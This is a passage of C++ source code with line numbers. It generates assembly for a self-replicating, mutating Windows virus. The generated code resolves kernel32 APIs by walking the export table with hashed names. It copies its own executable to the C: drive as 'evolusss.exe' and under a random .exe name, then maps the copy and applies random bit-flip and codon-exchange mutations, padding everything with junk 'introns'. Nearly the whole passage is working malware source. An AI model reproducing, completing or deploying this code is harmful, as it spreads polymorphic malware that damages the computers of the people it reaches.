782file << " _sub0001" << endl; CreateAnIntron();
783file << " _sub0001" << endl; CreateAnIntron();
784file << " _saveJmpOff ; mov BA2, eip - for further API searching in different DLLs" << endl; CreateAnIntron();
785
786file << " _pushall" << endl; CreateAnIntron();
787
788zer0(0);
789file << " _nopdB ; RegB = Counter for first instance loop = 0" << endl; CreateAnIntron();
790
791GetAddress("hAddressePointer");
792file << " _getdata" << endl; CreateAnIntron();
793file << " _nopdA ; RegA = Pointer to Buffer for API Addresse" << endl; CreateAnIntron();
794
795GetAddress("hMagicNumberPointer");
796file << " _getdata" << endl; CreateAnIntron();
797file << " _nopdD ; RegD = Pointer to Magic Numbers for APIs" << endl; CreateAnIntron();
798
799
800
801file << " ; FindAllAPIsNext" << endl; CreateAnIntron();
802file << " _getEIP" << endl; CreateAnIntron();
803file << " _sub0001" << endl; CreateAnIntron();
804file << " _sub0001" << endl; CreateAnIntron();
805file << " _sub0001" << endl; CreateAnIntron();
806file << " _sub0001" << endl; CreateAnIntron();
807file << " _sub0001" << endl; CreateAnIntron();
808file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
809
810
811file << " _pushall" << endl; CreateAnIntron();
812file << " ; RegA=free | used for pointer within the Name Pointer Table" << endl; CreateAnIntron();
813file << " ; RegB=free | used as temporary buffer" << endl; CreateAnIntron();
814file << " ; RegD=MagicNumber for API" << endl; CreateAnIntron();
815file << " ; Stack: | counter (number of APIs checked in kernel32.dll)" << endl; CreateAnIntron();
816
817GetAddress("hNamePointerTable");
818file << " _getdata" << endl; CreateAnIntron();
819file << " _nopdA ; Pointer to Name Pointer Table (points to first API)" << endl; CreateAnIntron();
820
821zer0(0);
822file << " _sub0001" << endl; CreateAnIntron();
823file << " _push ; counter" << endl; CreateAnIntron();
824
825file << " ; SearchNextAPI:" << endl; CreateAnIntron();
826file << " _getEIP" << endl; CreateAnIntron();
827file << " _sub0001" << endl; CreateAnIntron();
828file << " _sub0001" << endl; CreateAnIntron();
829file << " _sub0001" << endl; CreateAnIntron();
830file << " _sub0001" << endl; CreateAnIntron();
831file << " _sub0001" << endl; CreateAnIntron();
832file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
833
834file << " _pop" << endl; CreateAnIntron();
835addnumber("0x1");
836file << " _push" << endl; CreateAnIntron();
837
838GetAddress("hDLLlibrary32");
839file << " _getdata" << endl; CreateAnIntron();
840file << " _save ; kernel32.dll position" << endl; CreateAnIntron();
841
842file << " _nopsA ; Pointer to NamePointerTable" << endl; CreateAnIntron();
843file << " _getdata ; Points to API name" << endl; CreateAnIntron();
844file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
845file << " _sub0001 ; -- (for algorithm)" << endl; CreateAnIntron();
846file << " _nopdB ; save Pointer to API name" << endl; CreateAnIntron();
847
848
849file << " _nopsA" << endl; CreateAnIntron();
850addnumber("4");
851file << " _nopdA ; Has just effects in next loop" << endl; CreateAnIntron();
852
853file << " _pushall" << endl; CreateAnIntron();
854zer0(0);
855file << " _nopdA" << endl; CreateAnIntron();
856
857file << " _getEIP" << endl; CreateAnIntron();
858file << " _sub0001" << endl; CreateAnIntron();
859file << " _sub0001" << endl; CreateAnIntron();
860file << " _sub0001" << endl; CreateAnIntron();
861file << " _sub0001" << endl; CreateAnIntron();
862file << " _sub0001" << endl; CreateAnIntron();
863file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
864
865file << " _nopsA" << endl; CreateAnIntron();
866file << " _save ; RegA=MagicNumber" << endl; CreateAnIntron();
867
868file << " _nopsB" << endl; CreateAnIntron();
869addnumber("1");
870file << " _nopdB ; BC1=NamePointer++" << endl; CreateAnIntron();
871
872file << " _getdata ; BC1=dword[NamePointer+n]" << endl; CreateAnIntron();
873
874file << " _addsaved ; BC1=BC1 + BC2 = dword[NamePointer+n] xor MagicNumber" << endl; CreateAnIntron();
875file << " _nopdA" << endl; CreateAnIntron();
876
877zer0(0);
878addnumber("8");
879file << " _save" << endl; CreateAnIntron();
880
881file << " _nopsB" << endl; CreateAnIntron();
882file << " _getdata ; BC1=nxxx" << endl; CreateAnIntron();
883file << " _shr ; BC1=???n" << endl; CreateAnIntron();
884file << " _push" << endl; CreateAnIntron();
885
886zer0(0);
887addnumber("0xFF");
888file << " _save ; BC2=0xFF" << endl; CreateAnIntron();
889file << " _pop ; BC1=???n" << endl; CreateAnIntron();
890file << " _and ; BC1=000n" << endl; CreateAnIntron();
891
892file << " _JnzUp" << endl; CreateAnIntron();
893
894GetAddress("APITmpBuffer");
895file << " _saveWrtOff" << endl; CreateAnIntron();
896file << " _nopsA" << endl; CreateAnIntron();
897file << " _writeDWord ; mov dword[APITmpBuffer], RegA" << endl; CreateAnIntron();
898
899file << " _popall" << endl; CreateAnIntron();
900
901GetAddress("APITmpBuffer");
902file << " _getdata" << endl; CreateAnIntron();
903file << " _nopdB ; save MagicNumber of this API" << endl; CreateAnIntron();
904
905
906zer0(0);
907addnumber("0x0FFF");
908file << " _save ; save 0x0FFF in BC2" << endl; CreateAnIntron();
909
910file << " _nopsB" << endl; CreateAnIntron();
911file << " _and ; BC1=dword[MagicNumberOfThisAPI] && 0x0FFF" << endl; CreateAnIntron();
912file << " _nopdB" << endl; CreateAnIntron();
913
914file << " _nopsD ; Get Pointer to API MagicWord" << endl; CreateAnIntron();
915file << " _getdata" << endl; CreateAnIntron();
916file << " _and ; BC1=dword[MagicNumberSearchAPI] && 0x0FFF" << endl; CreateAnIntron();
917file << " _save ; save" << endl; CreateAnIntron();
918
919file << " _nopsB ; Get MagicNumber of current API again" << endl; CreateAnIntron();
920file << " _xor ; (dword[MagicNumberSearchAPI] && 0x0FFF) XOR dword[MagicNumberOfThisAPI] && 0x0FFF" << endl; CreateAnIntron();
921file << " ; If zero, assume that we found API" << endl; CreateAnIntron();
922file << " _JnzUp" << endl; CreateAnIntron();
923
924
925zer0(0);
926addnumber("1");
927file << " _save ; BC2=1" << endl; CreateAnIntron();
928
929file << " _pop ; Get Counter from Stack" << endl; CreateAnIntron();
930file << " _shl ; BC1=counter*2 (because Ordinal Table has just 2byte Entries)" << endl; CreateAnIntron();
931file << " ; (=no DLLs with more than 65535 functions?!)" << endl; CreateAnIntron();
932file << " _save" << endl; CreateAnIntron();
933
934GetAddress("hOrdinalTable");
935file << " _getdata" << endl; CreateAnIntron();
936file << " _addsaved ; Points to ordinal number of the API" << endl; CreateAnIntron();
937
938file << " _push" << endl; CreateAnIntron();
939zer0(0);
940addnumber("0xFFFF");
941file << " _save" << endl; CreateAnIntron();
942file << " _pop ; BC2=0xFFFF" << endl; CreateAnIntron();
943
944file << " _getdata ; BC1=Ordinal Number of API" << endl; CreateAnIntron();
945file << " ; Ordinal Number is a word, so we have to set the high word to zero" << endl; CreateAnIntron();
946file << " _and ; BC1=dword[Ordinal] && 0xFFFF" << endl; CreateAnIntron();
947
948file << " _push" << endl; CreateAnIntron();
949zer0(0);
950addnumber("2");
951file << " _save" << endl; CreateAnIntron();
952file << " _pop" << endl; CreateAnIntron();
953file << " _shl ; BC1=Ordinal*4, as Addresse to Function is a dword" << endl; CreateAnIntron();
954
955file << " _save" << endl; CreateAnIntron();
956
957GetAddress("hAddressTable");
958file << " _getdata" << endl; CreateAnIntron();
959
960file << " _addsaved ; BC1 points to Addresse of API Function" << endl; CreateAnIntron();
961file << " _getdata ; BC1=Addresse of API Function" << endl; CreateAnIntron();
962file << " _save" << endl; CreateAnIntron();
963
964GetAddress("hDLLlibrary32");
965file << " _getdata" << endl; CreateAnIntron();
966file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
967file << " ; BC1 contains the Addresse of the API in (kernel32) memory" << endl; CreateAnIntron();
968
969
970file << " _nopdB ; save the Addresse in RegB" << endl; CreateAnIntron();
971GetAddress("hAddressePointer");
972file << " _getdata ; Pointer to the buffer where we save the API addresse" << endl; CreateAnIntron();
973file << " _saveWrtOff ; We will write to this Addresse" << endl; CreateAnIntron();
974
975file << " _nopsB ; restore API Addresse" << endl; CreateAnIntron();
976
977file << " _writeDWord ; Save the API Function Addresse in the Function Buffer!!!" << endl; CreateAnIntron();
978
979
980file << " _popall" << endl; CreateAnIntron();
981
982GetAddress("hAddressePointer");
983file << " _saveWrtOff ; The buffer where we save the pointer" << endl; CreateAnIntron();
984
985file << " _nopsA" << endl; CreateAnIntron();
986addnumber("0x4");
987
988file << " _writeDWord ; save pointer" << endl; CreateAnIntron();
989file << " _nopdA ; save different (prevents a more messy code)" << endl; CreateAnIntron();
990
991file << " _nopsD ; Next Magic Number for API" << endl; CreateAnIntron();
992addnumber("0x4");
993file << " _nopdD" << endl; CreateAnIntron();
994
995file << " _nopsB" << endl; CreateAnIntron();
996addnumber("0x1");
997file << " _nopdB" << endl; CreateAnIntron();
998file << " _save" << endl; CreateAnIntron();
999
1000GetAddress("APINumber");
1001file << " _getdata" << endl; CreateAnIntron();
1002
1003
1004subsaved(0);
1005file << " _JnzUp ; Jnz FindAllAPIsNext" << endl; CreateAnIntron();
1006
1007file << " ; end FindAllAPIsNext" << endl; CreateAnIntron();
1008
1009file << " _popall" << endl; CreateAnIntron();
1010file << " ; FoundAPI" << endl; CreateAnIntron();
1011
1012file << "; end FindAllAPIs in kernel32.dll" << endl; CreateAnIntron();
1013
1014GetAddress("stDLLadvapi32");
1015file << " _push" << endl; CreateAnIntron();
1016file << " _CallAPILoadLibrary ; invoke LoadLibrary, " << static_cast<char>(34) << "kernel32.dll" << static_cast<char>(34) << "" << endl; CreateAnIntron();
1017
1018
1019GetAddress("hDLLlibrary32");
1020file << " _saveWrtOff" << endl; CreateAnIntron();
1021
1022
1023file << " _nopsA" << endl; CreateAnIntron();
1024file << " _writeDWord ; mov dword[hDLLkernel32], eax" << endl; CreateAnIntron();
1025
1026file << " _save ; Save kernel32.dll position" << endl; CreateAnIntron();
1027
1028addnumber("0x3C");
1029file << " _getdata ; mov RegB, dword[hDLLkernel32+0x3C]" << endl; CreateAnIntron();
1030
1031file << " ; = Pointer to PE Header of kernel32.dll" << endl; CreateAnIntron();
1032file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1033
1034addnumber("0x78");
1035file << " _getdata ; Export Tables" << endl; CreateAnIntron();
1036file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1037addnumber("0x1C");
1038
1039file << " _nopdA ; temporarily save Offset of Addresse Table in RegA" << endl; CreateAnIntron();
1040
1041GetAddress("hAddressTable");
1042file << " _saveWrtOff ; WriteOffset=hAddressTable" << endl; CreateAnIntron();
1043
1044file << " _nopsA ; restore RegA=Addresse Tables" << endl; CreateAnIntron();
1045file << " _getdata ; Pointer To Addresse Table" << endl; CreateAnIntron();
1046file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1047file << " _writeDWord ; mov dword[hAddressTable], (Pointer to Addresse Table)" << endl; CreateAnIntron();
1048
1049GetAddress("hNamePointerTable");
1050file << " _saveWrtOff ; WriteOffset=hNamePointerTable" << endl; CreateAnIntron();
1051
1052file << " _nopsA ; BC1=Addresse Table" << endl; CreateAnIntron();
1053addnumber("4");
1054file << " _nopdA" << endl; CreateAnIntron();
1055
1056file << " _getdata ; Pointer To Name Table" << endl; CreateAnIntron();
1057file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1058file << " _writeDWord ; mov dword[hNamePointerTable], (Pointer to Name Pointer Table)" << endl; CreateAnIntron();
1059
1060GetAddress("hOrdinalTable");
1061file << " _saveWrtOff ; WriteOffset=hOrdinalTable" << endl; CreateAnIntron();
1062
1063file << " _nopsA" << endl; CreateAnIntron();
1064addnumber("4");
1065
1066file << " _getdata ; Ordinal Table" << endl; CreateAnIntron();
1067file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1068file << " _writeDWord ; mov dword[hOrdinalTable], (Pointer to Ordinal Table)" << endl; CreateAnIntron();
1069
1070
1071GetAddress("APINumber");
1072file << " _saveWrtOff" << endl; CreateAnIntron();
1073zer0(0);
1074addnumber("APINumberAdvapi");
1075file << " _writeDWord ; Save number of kernel32.dll APIs" << endl; CreateAnIntron();
1076
1077GetAddress("hAddressePointer");
1078file << " _saveWrtOff" << endl; CreateAnIntron();
1079GetAddress("APIAddressesReg");
1080file << " _writeDWord ; Saves the AddressePointer" << endl; CreateAnIntron();
1081
1082
1083GetAddress("hMagicNumberPointer");
1084file << " _saveWrtOff" << endl; CreateAnIntron();
1085GetAddress("APIMagicNumbersReg");
1086file << " _writeDWord ; Saves the MagicNumber Pointer" << endl; CreateAnIntron();
1087
1088
1089zer0(0);
1090addnumber("42");
1091file << " _save" << endl; CreateAnIntron();
1092file << " _pop" << endl; CreateAnIntron();
1093file << " _sub0001" << endl; CreateAnIntron();
1094file << " _push" << endl; CreateAnIntron();
1095addnumber("1");
1096file << " _xor" << endl; CreateAnIntron();
1097file << " _JnzUp" << endl; CreateAnIntron();
1098
1099file << " _pop ; Remove trash from stack" << endl; CreateAnIntron();
1100
1101
1102zer0(0);
1103addnumber("0x8007");
1104file << " _push" << endl; CreateAnIntron();
1105CallAPI("hSetErrorMode");
1106
1107CallAPI("hGetTickCount");
1108
1109
1110file << "; ############################################################################" << endl; CreateAnIntron();
1111file << "; ############################################################################" << endl; CreateAnIntron();
1112file << "; ############################################################################" << endl; CreateAnIntron();
1113file << "; #####" << endl; CreateAnIntron();
1114file << "; ##### First child ..." << endl; CreateAnIntron();
1115file << "; #####" << endl; CreateAnIntron();
1116
1117
1118GetAddress("RandomNumber");
1119file << " _saveWrtOff" << endl; CreateAnIntron();
1120file << " _nopsA" << endl; CreateAnIntron();
1121file << " _writeDWord ; mov dword[RandomNumber], RegA" << endl; CreateAnIntron();
1122
1123zer0(0);
1124file << " _nopdB ; mov RegB, 0" << endl; CreateAnIntron();
1125
1126
1127file << "; RndNameLoop:" << endl; CreateAnIntron();
1128file << " _getEIP" << endl; CreateAnIntron();
1129file << " _sub0001" << endl; CreateAnIntron();
1130file << " _sub0001" << endl; CreateAnIntron();
1131file << " _sub0001" << endl; CreateAnIntron();
1132file << " _sub0001" << endl; CreateAnIntron();
1133file << " _sub0001" << endl; CreateAnIntron();
1134file << " _saveJmpOff ; mov esi, eip" << endl; CreateAnIntron();
1135
1136GetAddress("RandomNumber");
1137
1138file << " _getdata" << endl; CreateAnIntron();
1139file << " _nopdA ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
1140
1141
1142zer0(0);
1143file << " _nopdD ; mov edx, 0" << endl; CreateAnIntron();
1144
1145addnumber("26");
1146
1147file << " _div ; div ebx" << endl; CreateAnIntron();
1148
1149file << " _nopsD" << endl; CreateAnIntron();
1150addnumber("97");
1151file << " _nopdD ; add edx, 97" << endl; CreateAnIntron();
1152
1153file << " _nopsB ; ebx=ebp=count" << endl; CreateAnIntron();
1154file << " _save ; ebp=ebx=ecx=count" << endl; CreateAnIntron();
1155
1156GetAddress("RandomFileName");
1157file << " ; ebx=rfn, ebp=ecx=count" << endl; CreateAnIntron();
1158file << " _addsaved ; ebx=rfn+count, ebp=ecx=count" << endl; CreateAnIntron();
1159file << " _saveWrtOff ; edi=rfn+count, ebx=rfn+count, ebp=ecx=count" << endl; CreateAnIntron();
1160
1161
1162file << " _nopsD" << endl; CreateAnIntron();
1163file << " _writeByte ; mov byte[ecx+RandomFileName], dl" << endl; CreateAnIntron();
1164
1165CalcNewRandNumberAndSaveIt();
1166
1167file << " _nopsB" << endl; CreateAnIntron();
1168addnumber("1");
1169file << " _nopdB" << endl; CreateAnIntron();
1170file << " _save ; inc counter" << endl; CreateAnIntron();
1171
1172zer0(1);
1173addnumber("8");
1174subsaved(0);
1175
1176
1177file << " _JnzUp ; jnz esi" << endl; CreateAnIntron();
1178file << "; loop RndNameLoop" << endl; CreateAnIntron();
1179
1180GetAddress("rndext");
1181file << " _saveWrtOff" << endl; CreateAnIntron();
1182zer0(0);
1183addnumber("\'.exe\'");
1184file << " _writeDWord ; create extention" << endl; CreateAnIntron();
1185
1186CallAPI("hGetCommandLineA");
1187zer0(0);
1188addnumber("0xFF");
1189file << " _save" << endl; CreateAnIntron();
1190
1191file << " _nopsA" << endl; CreateAnIntron();
1192file << " _getdata" << endl; CreateAnIntron();
1193file << " _and" << endl; CreateAnIntron();
1194
1195file << " _nopdB ; RegB=1st byte of filename" << endl; CreateAnIntron();
1196zer0(0);
1197addnumber("34");
1198file << " _nopdD ; RegD=34" << endl; CreateAnIntron();
1199
1200
1201file << " _nopsB" << endl; CreateAnIntron();
1202file << " _save" << endl; CreateAnIntron();
1203file << " _nopsD" << endl; CreateAnIntron();
1204subsaved(0);
1205
1206file << " _JnzDown" << endl;
1207file << " _nopsA" << endl;
1208file << " _add0001" << endl;
1209file << " _nopdA" << endl;
1210file << " _nopREAL" << endl;
1211
1212file << " _nopsA" << endl; CreateAnIntron();
1213file << " _push ; Save RegA at stack" << endl; CreateAnIntron();
1214
1215file << "; FindEndOfString:" << endl; CreateAnIntron();
1216file << " _getEIP" << endl; CreateAnIntron();
1217file << " _sub0001" << endl; CreateAnIntron();
1218file << " _sub0001" << endl; CreateAnIntron();
1219file << " _sub0001" << endl; CreateAnIntron();
1220file << " _sub0001" << endl; CreateAnIntron();
1221file << " _sub0001" << endl; CreateAnIntron();
1222file << " _saveJmpOff ; mov esi, eip" << endl; CreateAnIntron();
1223
1224file << " _nopsA" << endl; CreateAnIntron();
1225addnumber("1");
1226file << " _nopdA" << endl; CreateAnIntron();
1227
1228zer0(0);
1229addnumber("0xFF");
1230file << " _save" << endl; CreateAnIntron();
1231file << " _nopsA" << endl; CreateAnIntron();
1232file << " _getdata" << endl; CreateAnIntron();
1233file << " _and" << endl; CreateAnIntron();
1234file << " _nopdD ; RegD=(dword[Name+count]&& 0xFF)" << endl; CreateAnIntron();
1235
1236zer0(0);
1237addnumber("34");
1238file << " _save" << endl; CreateAnIntron();
1239file << " _nopsB ; 1st Byte of filename" << endl; CreateAnIntron();
1240subsaved(1);
1241
1242file << " _JnzDown" << endl;
1243file << " _nopsD" << endl;
1244file << " _xor" << endl;
1245file << " _JnzUp" << endl;
1246file << " _nopREAL" << endl;
1247file << "; EndFindEndOfString:" << endl; CreateAnIntron();
1248
1249file << " _nopsA" << endl; CreateAnIntron();
1250file << " _saveWrtOff" << endl; CreateAnIntron();
1251
1252zer0(1);
1253addnumber("34");
1254file << " _nopsB ; 1st Byte of filename" << endl; CreateAnIntron();
1255subsaved(0);
1256file << " _JnzDown" << endl;
1257file << " _save" << endl;
1258file << " _xor" << endl;
1259file << " _writeByte" << endl;
1260file << " _nopREAL" << endl;
1261
1262file << " _pop" << endl; CreateAnIntron();
1263file << " _nopdA" << endl; CreateAnIntron();
1264
1265
1266GetAddress("Driveletter3-1");
1267file << " _saveWrtOff" << endl; CreateAnIntron();
1268zer0(0);
1269addnumber("0x5C3A4300");
1270file << " _writeDWord" << endl; CreateAnIntron();
1271
1272GetAddress("virusname");
1273file << " _saveWrtOff" << endl; CreateAnIntron();
1274zer0(0);
1275addnumber("\'evol\'");
1276file << " _writeDWord" << endl; CreateAnIntron();
1277
1278GetAddress("virusname+4");
1279file << " _saveWrtOff" << endl; CreateAnIntron();
1280zer0(0);
1281addnumber("\'usss\'");
1282file << " _writeDWord ; Construct virusfilename" << endl; CreateAnIntron();
1283
1284GetAddress("virext");
1285file << " _saveWrtOff" << endl; CreateAnIntron();
1286zer0(0);
1287addnumber("\'.exe\'");
1288file << " _writeDWord ; create extention" << endl; CreateAnIntron();
1289
1290file << " _nopsA" << endl; CreateAnIntron();
1291file << " _push ; Save pointer to filename buffer" << endl; CreateAnIntron();
1292zer0(0);
1293file << " _push" << endl; CreateAnIntron();
1294GetAddress("Driveletter3");
1295file << " _push" << endl; CreateAnIntron();
1296file << " _nopsA" << endl; CreateAnIntron();
1297file << " _push" << endl; CreateAnIntron();
1298CallAPI("hCopyFileA");
1299
1300file << " _pop" << endl; CreateAnIntron();
1301file << " _nopdA" << endl; CreateAnIntron();
1302zer0(0);
1303file << " _push" << endl; CreateAnIntron();
1304GetAddress("RandomFileName");
1305file << " _push" << endl; CreateAnIntron();
1306file << " _nopsA" << endl; CreateAnIntron();
1307file << " _push" << endl; CreateAnIntron();
1308CallAPI("hCopyFileA");
1309
1310zer0(0);
1311file << " _push" << endl; CreateAnIntron();
1312file << " _push" << endl; CreateAnIntron();
1313addnumber("3");
1314file << " _push" << endl; CreateAnIntron();
1315zer0(0);
1316file << " _push" << endl; CreateAnIntron();
1317addnumber("1");
1318file << " _push" << endl; CreateAnIntron();
1319file << " _sub0001" << endl; CreateAnIntron();
1320addnumber("0xC0000000");
1321file << " _push" << endl; CreateAnIntron();
1322GetAddress("RandomFileName");
1323file << " _push" << endl; CreateAnIntron();
1324CallAPI("hCreateFileA");
1325
1326
1327GetAddress("FileHandle");
1328file << " _saveWrtOff" << endl; CreateAnIntron();
1329file << " _nopsA" << endl; CreateAnIntron();
1330file << " _writeDWord ; mov dword[FileHandle], RegA" << endl; CreateAnIntron();
1331
1332file << " _save" << endl; CreateAnIntron();
1333
1334GetAddress("FileSize");
1335
1336file << " _push" << endl; CreateAnIntron();
1337zer0(1);
1338file << " _addsaved" << endl; CreateAnIntron();
1339file << " _push" << endl; CreateAnIntron();
1340CallAPI("hGetFileSize");
1341
1342GetAddress("FileSize");
1343file << " _saveWrtOff" << endl; CreateAnIntron();
1344file << " _nopsA" << endl; CreateAnIntron();
1345file << " _writeDWord ; mov dword[FileSize], RegA" << endl; CreateAnIntron();
1346
1347zer0(1);
1348file << " _push" << endl; CreateAnIntron();
1349file << " _addsaved" << endl; CreateAnIntron();
1350file << " _push" << endl; CreateAnIntron();
1351zer0(0);
1352file << " _push" << endl; CreateAnIntron();
1353addnumber("4");
1354file << " _push" << endl; CreateAnIntron();
1355zer0(0);
1356file << " _push" << endl; CreateAnIntron();
1357GetAddress("FileHandle");
1358file << " _getdata" << endl; CreateAnIntron();
1359file << " _push" << endl; CreateAnIntron();
1360CallAPI("hCreateFileMappingA");
1361
1362GetAddress("MapHandle");
1363
1364file << " _saveWrtOff" << endl; CreateAnIntron();
1365file << " _nopsA" << endl; CreateAnIntron();
1366file << " _writeDWord ; mov dword[MapHandle], RegA" << endl; CreateAnIntron();
1367
1368file << " _save" << endl; CreateAnIntron();
1369GetAddress("FileSize");
1370
1371file << " _getdata" << endl; CreateAnIntron();
1372file << " _push ; [FileSize]" << endl; CreateAnIntron();
1373zer0(1);
1374file << " _push ; 0" << endl; CreateAnIntron();
1375file << " _push ; 0" << endl; CreateAnIntron();
1376addnumber("2");
1377file << " _push" << endl; CreateAnIntron();
1378zer0(1);
1379file << " _addsaved" << endl; CreateAnIntron();
1380file << " _push ; MapHandle" << endl; CreateAnIntron();
1381
1382CallAPI("hMapViewOfFile");
1383
1384GetAddress("MapPointer");
1385
1386file << " _saveWrtOff" << endl; CreateAnIntron();
1387file << " _nopsA" << endl; CreateAnIntron();
1388file << " _writeDWord ; mov dword[MapPointer], RegA" << endl; CreateAnIntron();
1389
1390file << " _nopsA" << endl; CreateAnIntron();
1391file << " _nopdB ; mov RegB, RegA+AminoStartInMap" << endl; CreateAnIntron();
1392
1393
1394
1395
1396file << "; ############################################################################" << endl; CreateAnIntron();
1397file << "; ############################################################################" << endl; CreateAnIntron();
1398file << "; #####" << endl; CreateAnIntron();
1399file << "; ##### Here the mutation happens: Bitmutation, exchange of codons, ..." << endl; CreateAnIntron();
1400file << "; #####" << endl; CreateAnIntron();
1401
1402file << ";ANextByteInChain:" << endl; CreateAnIntron();
1403file << " _getEIP" << endl; CreateAnIntron();
1404file << " _sub0001" << endl; CreateAnIntron();
1405file << " _sub0001" << endl; CreateAnIntron();
1406file << " _sub0001" << endl; CreateAnIntron();
1407file << " _sub0001" << endl; CreateAnIntron();
1408file << " _sub0001" << endl; CreateAnIntron();
1409file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
1410
1411file << " _nopsB" << endl; CreateAnIntron();
1412file << " _push ; push counter" << endl; CreateAnIntron();
1413
1414
1415file << "; ############################################################################" << endl; CreateAnIntron();
1416file << "; ##### Start Bit-Flip Mutation (Point-Mutation)" << endl; CreateAnIntron();
1417
1418zer0(0);
1419addnumber("12");
1420file << " _save" << endl; CreateAnIntron();
1421
1422GetAddress("RandomNumber");
1423
1424file << " _getdata" << endl; CreateAnIntron();
1425file << " _shr" << endl; CreateAnIntron();
1426file << " _push" << endl; CreateAnIntron();
1427
1428zer0(0);
1429addnumber("7");
1430file << " _save" << endl; CreateAnIntron();
1431
1432file << " _pop" << endl; CreateAnIntron();
1433file << " _and ; BC1=[RandomNumber shr 12] && 0111b" << endl; CreateAnIntron();
1434file << " _save" << endl; CreateAnIntron();
1435
1436zer0(1);
1437addnumber("1");
1438file << " _shl ; shl BC1, BC2" << endl; CreateAnIntron();
1439file << " _save" << endl; CreateAnIntron();
1440
1441file << " _pop" << endl; CreateAnIntron();
1442file << " _push" << endl; CreateAnIntron();
1443file << " _saveWrtOff ; BA1=[MapPointer]+counter" << endl; CreateAnIntron();
1444
1445file << " _getdata ; mov BC1, dword[BC1]" << endl; CreateAnIntron();
1446file << " _xor ; xor BC1, BC2" << endl; CreateAnIntron();
1447file << " _nopdB ; save changed byte" << endl; CreateAnIntron();
1448
1449
1450zer0(0);
1451addnumber("7");
1452file << " _save" << endl; CreateAnIntron();
1453
1454GetAddress("RandomNumber");
1455
1456file << " _getdata" << endl; CreateAnIntron();
1457file << " _nopdA" << endl; CreateAnIntron();
1458
1459zer0(1);
1460file << " _nopdD" << endl; CreateAnIntron();
1461
1462addnumber("VarThreshold1");
1463
1464file << " _div" << endl; CreateAnIntron();
1465file << " _nopsD" << endl; CreateAnIntron();
1466subsaved(0);
1467file << " _JnzDown" << endl;
1468file << " _nopsB ; restore" << endl;
1469file << " _writeByte ; save mutation!" << endl;
1470file << " _nopREAL" << endl;
1471file << " _nopREAL" << endl;
1472
1473
1474file << "; ##### Finished Bit-Flip Mutation (Point-Mutation)" << endl; CreateAnIntron();
1475file << "; ############################################################################" << endl; CreateAnIntron();
1476
1477
1478CalcNewRandNumberAndSaveIt();
1479
1480
1481file << "; ############################################################################" << endl; CreateAnIntron();
1482file << "; ##### Start codons exchange" << endl; CreateAnIntron();
1483
1484
1485GetAddress("xchgBuffer");
1486file << " _saveWrtOff" << endl; CreateAnIntron();
1487
1488file << " _pop" << endl; CreateAnIntron();
1489file << " _push ; get counter" << endl; CreateAnIntron();
1490
1491file << " _getdata" << endl; CreateAnIntron();
1492file << " _writeDWord ; xchgBuffer=dword[counter]" << endl; CreateAnIntron();
1493
1494file << " _pop" << endl; CreateAnIntron();
1495file << " _push ; get counter" << endl; CreateAnIntron();
1496file << " _saveWrtOff ; save destination for potential writing" << endl; CreateAnIntron();
1497
1498addnumber("4");
1499file << " _getdata" << endl; CreateAnIntron();
1500file << " _nopdB ; RegB=dword[counter+4]" << endl; CreateAnIntron();
1501
1502
1503zer0(0);
1504addnumber("7");
1505file << " _save" << endl; CreateAnIntron();
1506GetAddress("RandomNumber");
1507
1508file << " _getdata" << endl; CreateAnIntron();
1509file << " _nopdA" << endl; CreateAnIntron();
1510
1511zer0(1);
1512file << " _nopdD" << endl; CreateAnIntron();
1513
1514addnumber("xchgThreshold1");
1515
1516file << " _div" << endl; CreateAnIntron();
1517file << " _nopsD" << endl; CreateAnIntron();
1518subsaved(0);
1519
1520file << " _JnzDown ; if not zero, dont exchange codons" << endl;
1521file << " _nopsB ; restore" << endl;
1522file << " _writeDWord ; save mutation!" << endl;
1523file << " _nopREAL" << endl;
1524file << " _nopREAL" << endl;
1525
1526GetAddress("xchgBuffer");
1527file << " _getdata" << endl; CreateAnIntron();
1528
1529file << " _nopdB" << endl; CreateAnIntron();
1530
1531file << " _pop" << endl; CreateAnIntron();
1532file << " _push ; get counter" << endl; CreateAnIntron();
1533addnumber("4");
1534file << " _saveWrtOff" << endl; CreateAnIntron();
1535
1536
1537zer0(0);
1538addnumber("7");
1539file << " _save" << endl; CreateAnIntron();
1540GetAddress("RandomNumber");
1541
1542file << " _getdata" << endl; CreateAnIntron();
1543file << " _nopdA" << endl; CreateAnIntron();
1544
1545zer0(1);
1546file << " _nopdD" << endl; CreateAnIntron();
1547
1548addnumber("xchgThreshold1");
1549
1550file << " _div" << endl; CreateAnIntron();
1551file << " _nopsD" << endl; CreateAnIntron();
1552subsaved(0);
1553
1554file << " _JnzDown ; if not zero, dont exchange codons" << endl;
1555file << " _nopsB ; restore" << endl;
1556file << " _writeDWord ; save mutation!" << endl;
1557file << " _nopREAL" << endl;
1558file << " _nopREAL" << endl;
1559
1560
1561
1562CalcNewRandNumberAndSaveIt();
1563
1564
1565file << " _pop" << endl; CreateAnIntron();
1566addnumber("1");
1567file << " _nopdB ; inc counter" << endl; CreateAnIntron();
1568
1569GetAddress("MapPointer");
1570file << " _getdata" << endl; CreateAnIntron();
1571file << " _save" << endl; CreateAnIntron();
1572zer0(1);
1573
1574GetAddress("FileSize");
1575file << " _getdata" << endl; CreateAnIntron();
1576
1577file << " _sub0001" << endl; CreateAnIntron();
1578file << " _sub0001" << endl; CreateAnIntron();
1579file << " _sub0001" << endl; CreateAnIntron();
1580file << " _sub0001" << endl; CreateAnIntron();
1581file << " _sub0001" << endl; CreateAnIntron();
1582file << " _sub0001" << endl; CreateAnIntron();
1583file << " _sub0001" << endl; CreateAnIntron();
1584file << " _sub0001" << endl; CreateAnIntron();
1585file << " _sub0001 ; Dont mutate the last 9 bytes because of xchg problems" << endl; CreateAnIntron();
1586
1587file << " _addsaved" << endl; CreateAnIntron();
1588file << " _save ; mov save, [MapPointer]+GenomEndInMap" << endl; CreateAnIntron();
1589
1590file << " _nopsB" << endl; CreateAnIntron();
1591subsaved(0);
